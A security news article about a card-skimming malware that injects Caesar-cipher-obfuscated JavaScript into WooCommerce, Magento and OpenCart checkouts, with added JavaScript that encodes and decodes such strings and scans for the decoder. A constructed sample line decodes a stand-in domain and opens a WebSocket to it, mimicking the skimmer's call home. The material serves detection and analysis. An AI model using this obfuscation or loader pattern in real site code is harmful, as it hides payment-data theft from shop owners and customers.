New Skimmer Malware Attacking E-commerce Websites


Researchers have identified a new variant of credit card skimming malware, dubbed the Caesar Cipher Skimmer, that targets multiple content management systems (CMS), including WordPress, Magento, and OpenCart.

The skimmer goes after the checkout process, injecting malicious code into the checkout PHP file. The injected code relies on obfuscated strings and a Caesar cipher shift to hide its payload. A single new skimmer being deployed across several platforms at the same time is uncommon, which is what makes the finding significant.

(Image: SiteCheck website malware detection for a credit card skimmer infection.)

A client reported credit card theft on their WooCommerce checkout page. The investigation found malware injected into the form-checkout.php script, which renders the WooCommerce checkout form and, according to a recent threat report, was a common injection target in 2023. Because every order passes through that template, it is an effective place for attackers to harvest credit card details.

In the recent gtag skimmer injections, attackers use a Caesar cipher to obfuscate the malicious code. The decoder in the injected script splits the obfuscated string into individual characters, reverses their order, subtracts a fixed value (3 in the observed samples) from each character's Unicode code unit, converts the shifted codes back to characters, and rejoins them into the original string. The result looks less suspicious at a glance than a plaintext payload, but the call to String.fromCharCode and the run of jumbled characters it operates on remain red flags for anyone reviewing the script.

The obfuscated string fragments are first joined, then separated into individual characters and reversed. The shift operates on the numeric value that Unicode, the character encoding standard, assigns to each character. The str_rot13 function, which also appears here, is itself a Caesar cipher: a straightforward substitution that shifts each letter by a fixed amount, 13 positions in its case.

(Image: Caesar cipher.)

The malware authors apply the same Caesar shift to the payload domain. The injected script recovers the domain at runtime by subtracting 3 from each Unicode code unit of the stored string, so the real domain never appears in plaintext in the file. That makes it harder for antivirus software and security vendors to detect the malicious domain with simple string or signature matching.
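As an added illustration (this is not code from the article or from Sucuri's write-up), the following JavaScript implements the split/reverse/shift-by-3 decoding described above, the matching encoding step that produces such strings, a brute-force recovery for samples where the shift is unknown, and a small heuristic scanner that flags the decoder's fingerprints (String.fromCharCode, split('').reverse(), an arithmetic offset on charCodeAt, a WebSocket call) in script text. The domain checkout-analytics.example and the sample snippet are constructed for the example and are not indicators from the report.

```javascript
// Added example (not from the article or Sucuri): Caesar-shift obfuscation as the
// skimmer's decoder undoes it, plus a scanner for the decoder pattern in script text.
// The domain and snippet below are constructed for illustration, not real indicators.

const SHIFT = 3; // the fixed offset the article reports for the observed samples

// Encoding step implied by the decoder: shift every UTF-16 code unit up by `shift`,
// then reverse the character order.
function caesarObfuscate(plain, shift = SHIFT) {
  return plain
    .split('')
    .map((c) => String.fromCharCode(c.charCodeAt(0) + shift))
    .reverse()
    .join('');
}

// Decoding step as the article describes the injected script doing it: split into
// characters, reverse, subtract the shift from each code unit, rejoin.
function caesarDeobfuscate(obf, shift = SHIFT) {
  return obf
    .split('')
    .reverse()
    .map((c) => String.fromCharCode(c.charCodeAt(0) - shift))
    .join('');
}

// Loose hostname shape used to rank decoding candidates.
const DOMAIN_RE = /^[a-z0-9-]+(\.[a-z0-9-]+)*\.[a-z]{2,}$/i;

// When a sample uses an unknown shift, try every small offset in both directions,
// with and without the reversal, and keep the outputs that look like a hostname.
function recoverDomainCandidates(obf, maxShift = 25) {
  const candidates = [];
  for (let shift = -maxShift; shift <= maxShift; shift++) {
    if (shift === 0) continue;
    for (const reversed of [true, false]) {
      const chars = obf.split('');
      if (reversed) chars.reverse();
      const value = chars.map((c) => String.fromCharCode(c.charCodeAt(0) - shift)).join('');
      if (DOMAIN_RE.test(value)) candidates.push({ shift, reversed, value });
    }
  }
  return candidates;
}

// Fingerprints of the decoder routine; two or more together is worth a manual look.
function scanForCaesarDecoder(scriptText) {
  const indicators = {
    fromCharCode: /String\.fromCharCode/.test(scriptText),
    splitReverse: /\.split\(\s*(['"])\1\s*\)\s*\.reverse\(\s*\)/.test(scriptText),
    codeUnitShift: /charCodeAt\(\s*0?\s*\)\s*[-+]\s*\d+/.test(scriptText),
    webSocket: /new\s+WebSocket\s*\(/.test(scriptText),
  };
  const score = Object.values(indicators).filter(Boolean).length;
  return { score, indicators, suspicious: score >= 2 };
}

// Pull every simple string literal out of the script, decode each with the
// given shift, and return the ones that decode to a hostname.
function decodeLiteralsIn(scriptText, shift = SHIFT) {
  const literalRe = /'([^'\\\n]*)'|"([^"\\\n]*)"/g;
  const hits = [];
  let m;
  while ((m = literalRe.exec(scriptText)) !== null) {
    const literal = m[1] !== undefined ? m[1] : m[2];
    const decoded = caesarDeobfuscate(literal, shift);
    if (DOMAIN_RE.test(decoded)) hits.push({ literal, decoded });
  }
  return hits;
}

// Constructed sample in the shape the article describes (not real skimmer code).
const SAMPLE_DOMAIN = 'checkout-analytics.example';
const SAMPLE_SNIPPET = [
  "var h = '" + caesarObfuscate(SAMPLE_DOMAIN) + "';",
  "var d = h.split('').reverse().map(function (c) { return String.fromCharCode(c.charCodeAt(0) - 3); }).join('');",
  "var ws = new WebSocket('wss://' + d + '/ws');",
].join('\n');

console.log(scanForCaesarDecoder(SAMPLE_SNIPPET));
console.log(decodeLiteralsIn(SAMPLE_SNIPPET));
```

The scanner is deliberately loose: String.fromCharCode and split('').reverse() both occur in legitimate minified code, so the score is a triage signal, not a verdict. Once a decoder is spotted, decodeLiteralsIn with the shift read off the charCodeAt arithmetic gives the hidden hostname directly, and recoverDomainCandidates covers variants that change the offset.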

The malware then connects to a remote server via WebSocket to receive further instructions.

Some versions of the malware can even identify logged-in WordPress users and modify the skimmer behavior accordingly. Code comments within the malware script suggest that the developers are Russian-speaking. 


According to Sucuri, this e-commerce malware has been found on WordPress, Magento, and OpenCart sites.

On WordPress, attackers plant the injection in WooCommerce's form-checkout.php file or through the Insert Headers and Footers (WPCode) plugin, which inserts its configured code into every page.

On Magento, they target the core_config_data table, where custom code that stores the credit card skimming JavaScript is kept. On OpenCart the exact injection location had not yet been observed and was still under investigation.


